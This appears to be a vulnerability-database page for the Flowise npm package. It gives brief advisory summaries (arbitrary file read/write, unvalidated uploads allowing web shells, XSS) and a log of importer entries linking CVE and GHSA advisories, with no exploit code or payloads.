VCID-qgs1-hazv-67b8 Flowise is a drag & drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to exploit this vulnerability to read and write arbitrary files to any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability. CVE-2025-61913
GHSA-jv9m-vf54-chjj
VCID-vr8t-gq97-wuc8 Flowise is a drag & drop user interface to build a customized large language model flow. A file upload vulnerability in version 3.0.7 of FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered. The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities. This presents a high-severity threat to system integrity and confidentiality. As of time of publication, no known patched versions are available. CVE-2025-61687
GHSA-35g6-rrw3-v6xc
VCID-zwz7-byj4-6qan Flowise vulnerable to XSS GHSA-4fr9-3x69-36wv

Date Actor Action Vulnerability Source VulnerableCode Version
2026-06-12T22:22:44.388766+00:00 GitLab Importer Affected by VCID-6ufs-d346-d7ev https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-8026.yml 38.6.0
2026-06-12T22:11:36.885977+00:00 GitLab Importer Affected by VCID-5pup-kgaf-3ubw https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41264.yml 38.6.0
2026-06-12T22:11:04.380686+00:00 GitLab Importer Affected by VCID-hkfs-v3bp-kbh5 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41265.yml 38.6.0
2026-06-12T22:09:39.794686+00:00 GitLab Importer Affected by VCID-3gp6-wwtd-kkf1 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41279.yml 38.6.0
2026-06-12T22:09:38.373379+00:00 GitLab Importer Affected by VCID-zwna-stj5-3yhm https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41278.yml 38.6.0
2026-06-12T22:09:36.391162+00:00 GitLab Importer Affected by VCID-14af-nhf3-aqba https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41277.yml 38.6.0
2026-06-12T22:09:04.119548+00:00 GitLab Importer Affected by VCID-d4wa-szeh-43ab https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41267.yml 38.6.0
2026-06-12T22:08:58.108541+00:00 GitLab Importer Affected by VCID-pzza-9xq9-a7de https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41268.yml 38.6.0
2026-06-12T22:08:57.625239+00:00 GitLab Importer Affected by VCID-v9hg-7pex-g3dp https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-w6v6-49gh-mc9w.yml 38.6.0
2026-06-12T22:08:53.416691+00:00 GitLab Importer Affected by VCID-71uq-yx2j-cqak https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41275.yml 38.6.0
2026-06-12T22:08:50.802071+00:00 GitLab Importer Affected by VCID-tdm1-91mc-8kgr https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-cc4f-hjpj-g9p8.yml 38.6.0
2026-06-12T22:08:48.436178+00:00 GitLab Importer Affected by VCID-j5hh-haj2-qydg https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41137.yml 38.6.0
2026-06-12T22:08:43.820765+00:00 GitLab Importer Affected by VCID-fu6t-9dk4-jbh9 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-40933.yml 38.6.0
2026-06-12T22:08:31.364383+00:00 GitLab Importer Affected by VCID-w9yr-5jbp-q7fm https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41276.yml 38.6.0
2026-06-12T22:08:07.829169+00:00 GitLab Importer Affected by VCID-e65e-s5sd-kuhp https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41272.yml 38.6.0
2026-06-12T22:08:03.598184+00:00 GitLab Importer Affected by VCID-a1e4-f5dh-w3a5 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-6pcv-j4jx-m4vx.yml 38.6.0
2026-06-12T22:07:44.700289+00:00 GitLab Importer Affected by VCID-v1nz-wwsu-qycg https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41270.yml 38.6.0
2026-06-12T22:07:44.197449+00:00 GitLab Importer Affected by VCID-b97u-efzx-dffn https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41274.yml 38.6.0
2026-06-12T22:07:25.085518+00:00 GitLab Importer Affected by VCID-17k4-psgt-sydg https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-m7mq-85xj-9x33.yml 38.6.0
2026-06-12T22:06:36.063809+00:00 GitLab Importer Affected by VCID-19jc-umg6-v7ce https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-43995.yml 38.6.0
2026-06-12T22:06:04.481182+00:00 GitLab Importer Affected by VCID-gvpx-4wkw-43cz https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-9hrv-gvrv-6gf2.yml 38.6.0
2026-06-12T22:05:54.864790+00:00 GitLab Importer Affected by VCID-1xfp-4rtg-4bcu https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41138.yml 38.6.0
2026-06-12T22:05:52.495963+00:00 GitLab Importer Affected by VCID-dzed-27rk-3qav https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41273.yml 38.6.0
2026-06-12T22:05:50.937291+00:00 GitLab Importer Affected by VCID-bkmk-k9mn-ekhx https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-2qqc-p94c-hxwh.yml 38.6.0
2026-06-12T22:05:50.435418+00:00 GitLab Importer Affected by VCID-aqg8-6us7-uqef https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41266.yml 38.6.0
2026-06-12T22:05:42.975008+00:00 GitLab Importer Affected by VCID-rgmv-6bqh-eqf2 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41271.yml 38.6.0
2026-06-12T22:05:41.051162+00:00 GitLab Importer Affected by VCID-ejdc-j73x-jydk https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-41269.yml 38.6.0
2026-06-12T21:22:01.512153+00:00 GitLab Importer Affected by VCID-dtss-epth-z7fh https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-31829.yml 38.6.0
2026-06-12T21:18:40.864075+00:00 GitLab Importer Affected by VCID-k579-xd81-hqdu https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-30821.yml 38.6.0
2026-06-12T21:18:38.687018+00:00 GitLab Importer Affected by VCID-m3j3-4u39-euht https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-30823.yml 38.6.0
2026-06-12T21:18:35.148512+00:00 GitLab Importer Affected by VCID-jcze-eg2c-mkcf https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-30824.yml 38.6.0
2026-06-12T21:18:26.888988+00:00 GitLab Importer Affected by VCID-488c-vrqu-f7hf https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-30820.yml 38.6.0
2026-06-12T21:18:26.377742+00:00 GitLab Importer Affected by VCID-affy-v76q-fub6 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2026-30822.yml 38.6.0
2026-06-12T21:18:18.649353+00:00 GitLab Importer Affected by VCID-9bht-svq8-87b4 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-x2g5-fvc2-gqvp.yml 38.6.0
2026-06-12T21:17:52.286671+00:00 GitLab Importer Affected by VCID-ksmv-s6c9-t7ap https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-jc5m-wrp2-qq38.yml 38.6.0
2026-06-12T20:29:31.525005+00:00 GitLab Importer Affected by VCID-ywgu-76cy-uqe7 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-x7rp-qj2h-ghgw.yml 38.6.0
2026-06-12T15:48:56.622942+00:00 GitLab Importer Fixing VCID-abyp-yn76-1yfp https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2025-34267.yml 38.6.0
2026-06-12T15:48:56.093496+00:00 GitLab Importer Fixing VCID-jmps-anck-eqdt https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-j44m-5v8f-gc9c.yml 38.6.0
2026-06-12T15:48:55.143571+00:00 GitLab Importer Fixing VCID-qgs1-hazv-67b8 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2025-61913.yml 38.6.0
2026-06-12T15:48:54.385132+00:00 GitLab Importer Fixing VCID-vr8t-gq97-wuc8 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2025-61687.yml 38.6.0
2026-06-12T15:48:53.213638+00:00 GitLab Importer Fixing VCID-39aw-3gc6-bkgb https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2025-50538.yml 38.6.0
2026-06-12T15:48:53.077892+00:00 GitLab Importer Fixing VCID-zwz7-byj4-6qan https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-4fr9-3x69-36wv.yml 38.6.0
2026-06-12T07:52:33.964299+00:00 GithubOSV Importer Fixing VCID-vr8t-gq97-wuc8 https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-35g6-rrw3-v6xc/GHSA-35g6-rrw3-v6xc.json 38.6.0
2026-06-12T07:52:32.196941+00:00 GithubOSV Importer Fixing VCID-jmps-anck-eqdt https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-j44m-5v8f-gc9c/GHSA-j44m-5v8f-gc9c.json 38.6.0
2026-06-12T07:52:31.401853+00:00 GithubOSV Importer Fixing VCID-qgs1-hazv-67b8 https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-jv9m-vf54-chjj/GHSA-jv9m-vf54-chjj.json 38.6.0
2026-06-12T07:52:29.503952+00:00 GithubOSV Importer Fixing VCID-abyp-yn76-1yfp https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-r4hh-pcgx-j5r2/GHSA-r4hh-pcgx-j5r2.json 38.6.0
2026-06-12T07:52:29.393777+00:00 GithubOSV Importer Fixing VCID-zwz7-byj4-6qan https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-4fr9-3x69-36wv/GHSA-4fr9-3x69-36wv.json 38.6.0
2026-06-12T07:52:22.444217+00:00 GithubOSV Importer Fixing VCID-39aw-3gc6-bkgb https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-964p-j4gg-mhwc/GHSA-964p-j4gg-mhwc.json 38.6.0
2026-06-11T20:36:30.156249+00:00 GHSA Importer Fixing VCID-abyp-yn76-1yfp https://github.com/advisories/GHSA-r4hh-pcgx-j5r2 38.6.0
2026-06-11T20:36:27.776901+00:00 GHSA Importer Fixing VCID-jmps-anck-eqdt https://github.com/advisories/GHSA-j44m-5v8f-gc9c 38.6.0
2026-06-11T20:36:26.255446+00:00 GHSA Importer Fixing VCID-qgs1-hazv-67b8 https://github.com/advisories/GHSA-jv9m-vf54-chjj 38.6.0
2026-06-11T20:36:26.037758+00:00 GHSA Importer Fixing VCID-vr8t-gq97-wuc8 https://github.com/advisories/GHSA-35g6-rrw3-v6xc 38.6.0
2026-06-11T20:36:24.224075+00:00 GHSA Importer Fixing VCID-39aw-3gc6-bkgb https://github.com/advisories/GHSA-964p-j4gg-mhwc 38.6.0
2026-06-11T20:36:24.192979+00:00 GHSA Importer Fixing VCID-zwz7-byj4-6qan https://github.com/advisories/GHSA-4fr9-3x69-36wv 38.6.0